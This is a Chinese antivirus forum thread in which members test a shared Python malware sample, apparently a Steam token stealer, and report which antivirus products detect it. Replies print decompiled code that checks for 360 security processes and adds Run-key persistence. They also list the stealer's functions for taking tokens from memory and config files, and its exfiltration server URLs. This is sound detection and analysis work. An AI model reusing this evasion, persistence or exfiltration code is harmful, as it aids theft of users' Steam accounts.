查看: 392|回复: 10
收起左侧

[病毒样本] 偷steam的东西

[复制链接]
xiaozhu009
发表于 昨天 14:30 | 显示全部楼层 |阅读模式
1.pyc是源文件
1.py是反编译之后的代码

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +3 收起 理由
莒县小哥 + 3 版区有你更精彩: )

查看全部评分

dd2006
发表于 昨天 14:34 | 显示全部楼层
本帖最后由 dd2006 于 2026-1-29 14:43 编辑

瑞星 kill
华为 miss
红伞 miss
SEP miss

居然还检测数字软件:
  1. def check_360_running():
  2.     try:
  3.         output = subprocess.check_output("tasklist", shell=True, text=True, timeout=10)
  4.         process_list = output.lower()
  5.         qihoo_processes = ['360tray.exe', '360sd.exe', 'zhudongfangyu.exe',
  6.          '360safe.exe',
  7.          'safemon.exe', 'liveud.exe']
  8.         for proc in qihoo_processes:
  9.             if proc in process_list:
  10.                 return True

  11.         return False
  12.     except Exception as e:
  13.         try:
  14.             return False
  15.         finally:
  16.             e = None
  17.             del e


  18. def add_to_startup():
  19.     try:
  20.         key_path = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
  21.         key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, key_path, 0, winreg.KEY_SET_VALUE)
  22.         exe_path = sys.executable
  23.         script_path = os.path.abspath(__file__)
  24.         cmd = f'"{exe_path}" "{script_path}"'
  25.         winreg.SetValueEx(key, "SteamHelper", 0, winreg.REG_SZ, cmd)
  26.         winreg.CloseKey(key)
  27.         print("[启动项] 已成功添加到注册表启动项")
  28.         return True
  29.     except Exception as e:
  30.         try:
  31.             return False
  32.         finally:
  33.             e = None
  34.             del e


  35. def init_startup():
  36.     try:
  37.         if check_360_running():
  38.             print("[启动项] 检测到360正在运行,跳过添加启动项")
  39.         else:
  40.             print("[启动项] 未检测到360,准备添加启动项")
  41.             add_to_startup()
  42.     except:
  43.         pass
复制代码







本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
莒县小哥
发表于 昨天 14:39 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
WGC_ZY
发表于 昨天 14:41 | 显示全部楼层
ESSP miss
rok827
发表于 昨天 14:43 | 显示全部楼层
火绒

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
微微的笑
头像被屏蔽
发表于 昨天 14:54 | 显示全部楼层
  1. # 检测防病毒软件
  2. def check_360_running()

  3. # 添加到Windows启动项
  4. def add_to_startup()

  5. # 从Steam进程内存中扫描并窃取令牌
  6. def extract_memory_token()

  7. # 从本地配置文件中解密并窃取令牌
  8. def extract_decrypt_tokens()

  9. # 将窃取的数据发送到攻击者服务器
  10. def upload_memory_token(steam_id, token)
复制代码
  1. # 三个不同的服务器端口,用于上传不同方式窃取的数据
  2. "http://peaceful.to:8551/aee.php"    # 主内存令牌
  3. "http://154.23.195.205:8551/aee.php"
  4. "http://peaceful.to:8552/aee.php"    # 旧版内存令牌
  5. "http://154.23.195.205:8552/aee.php"
  6. "http://peaceful.to:8550/aee.php"    # 解密令牌
  7. "http://154.23.195.205:8550/aee.php"
复制代码


AMD_Ryzen
发表于 昨天 15:42 | 显示全部楼层
BEST 扫描miss
MrDeep
发表于 昨天 16:04 | 显示全部楼层
本帖最后由 MrDeep 于 2026-1-29 16:07 编辑

ESET开双浅解压
1.pyc——Python/PSW.Agent.EDL trojan

管家18
1.py——Win32.Trojan.LummaStealer.Zwhl
1.pyc——Win32.Trojan.LummaStealer.Tdkl


WGC_ZY
发表于 昨天 17:20 | 显示全部楼层
MrDeep 发表于 2026-1-29 16:04
ESET开双浅解压
1.pyc——Python/PSW.Agent.EDL trojan

诶竟然这么快就能查杀了,我测那会儿还啥反应都没有,于是点了个提交样本。刚一复测果然行了。
一成不变
发表于 昨天 18:06 | 显示全部楼层
卡巴扫描kill 2x
腾管扫描kill 2x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-1-30 00:10 , Processed in 0.080333 second(s), 2 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表